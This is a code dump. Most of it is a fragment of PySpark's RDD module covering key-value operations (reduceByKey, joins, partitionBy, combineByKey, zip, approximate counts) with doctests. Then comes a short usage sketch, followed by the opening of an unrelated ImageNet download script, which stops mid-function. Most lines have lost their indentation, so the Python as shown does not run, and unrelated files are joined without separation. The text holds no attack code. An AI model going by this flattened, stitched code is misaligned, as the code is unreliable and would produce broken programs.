Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
        The default partitioner is hash-partitioning.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
        Perform a full outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
    # portable_hash is used as the default because the builtin hash of None
    # differs across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
        a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
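        A minimal illustrative example (assuming the C{sc} doctest fixture used
        throughout this file):
        >>> from operator import add
        >>> rdd = sc.parallelize([("a", 1), ("a", 2), ("b", 3)])
        >>> sorted(rdd.aggregateByKey(0, add, add).collect())
        [('a', 3), ('b', 3)]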
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
        (e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
        first element in each RDD, second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
        more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
        It will convert each Python object into a Java object by Pyrolite, whether the
        RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
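            # Compose the previous stage's function with this one so that both run
            # in a single pass over each partition inside the same Python worker.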
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
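The pair-RDD aggregation methods above (reduceByKey, aggregateByKey, combineByKey, groupByKey) all funnel into combineByKey with map-side combining. The following is a minimal local sketch of how their results relate; it assumes only a standard pyspark installation, and the master URL and application name are illustrative rather than anything defined in this file.

from operator import add

from pyspark import SparkContext

if __name__ == "__main__":
    sc = SparkContext("local[2]", "pair-aggregation-sketch")
    pairs = sc.parallelize([("a", 1), ("b", 4), ("a", 2), ("b", 5)])

    # reduceByKey: one commutative/associative function merges values per key.
    print(sorted(pairs.reduceByKey(add).collect()))              # [('a', 3), ('b', 9)]

    # aggregateByKey: separate functions for value-into-accumulator and accumulator merge.
    print(sorted(pairs.aggregateByKey(0, add, add).collect()))   # [('a', 3), ('b', 9)]

    # combineByKey: the general form; here it builds a per-key list of values.
    combined = pairs.combineByKey(lambda v: [v],
                                  lambda acc, v: acc + [v],
                                  lambda a, b: a + b)
    print(sorted((k, sorted(v)) for k, v in combined.collect()))  # [('a', [1, 2]), ('b', [4, 5])]

    # groupByKey shuffles every value; prefer the combiners above when a plain
    # aggregate (sum, count, ...) is all that is needed.
    print(sorted((k, sorted(v)) for k, v in pairs.groupByKey().collect()))
    sc.stop()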
|
convert_imagenet_data_set.py
|
import os
import numpy as np
import random
import time
from datetime import datetime as dt
import matplotlib.pyplot as plt
from PIL import Image
import math
from pathlib import Path, PurePath
from urllib import request
import urllib.error
import pandas as pd
from ggutils import get_module_logger
import http.client
from multiprocessing import Process, Manager
import argparse
logger = get_module_logger()
CODE_TRAIN = 0 # data_set_def code for train data
CODE_TEST = 1 # data_set_def code for test data
IMAGENET_WORDS_URL = 'http://image-net.org/archive/words.txt'
ROOT_DIR_PATH = '/var/data/'
WORK_DIR_PATH = os.path.join(ROOT_DIR_PATH, 'work')
DIST_DATA_DIR = os.path.join(ROOT_DIR_PATH, 'imagenet1000-image')
DEFAULT_HTTP_REQUEST_TIMEOUT = 60  # time out after 1 minute
'''
1. Downloads the ImageNet words file from
http://image-net.org/archive/words.txt
to WORK_DIR_PATH
2. Downloads data files into:
DIST_DATA_DIR
├── [ID_0] // images labeled 0 (name: 'tench') with ID_0: 'n01440764'
| ├── image_file_status.csv // csv file with columns 0:url, 1:status
| ├── imagenet_url_list.csv // csv file with columns 0:url(ImageNet url)
| ├── [image file] // image files
...
|
...
├── [ID_999] // images labeled 999 (name: 'toilet tissue') with ID_999: 'n15075141'
├── data_set_def // data set definition directory
└── train_imagenet1000_classification.csv // data set definition file for training and testing
'''
STATUS_INIT = 0
STATUS_DOWNLOADED = 1
STATUS_ANAVAILABLE = 2
STATUS_FILE_NAME = 'image_file_status.csv'
IMAGENET_URL_LIST_FILE_NAME = 'imagenet_url_list.csv'
CLASS_FILE_PATH = 'imagenet_1000_class.csv'
def is_url(url):
try:
return url.split('://')[0].find('http') >= 0
except Exception:
return False
class ImageNetDownloadStatus():
"""Class to manage how the ImageNet download status is
self.df: DataFrame that contains the ImageNet download status for an ID.
columns=['url', 'status']
url: URL of files to be downloaded
status: STATUS_INIT=0, STATUS_DOWNLOADED=1, STATUS_ANAVAILABLE=2
"""
def __init__(self, id):
self.id = id
self.total_download_size = 0 # int size in byte
dir_path = os.path.join(DIST_DATA_DIR, id)
self.status_file_path = os.path.join(dir_path, STATUS_FILE_NAME)
os.makedirs(dir_path, exist_ok=True)
if os.path.isfile(self.status_file_path):
self.df = pd.read_csv(self.status_file_path)
else:
df_src_array = [['https://www.geek-guild.jp/hoge.jpg', STATUS_ANAVAILABLE]]
self.df = pd.DataFrame(df_src_array, columns=['url', 'status'])
def update_downloaded(self, all_image_url_list):
        all_image_url_list = [image_url for image_url in all_image_url_list if image_url is not None]
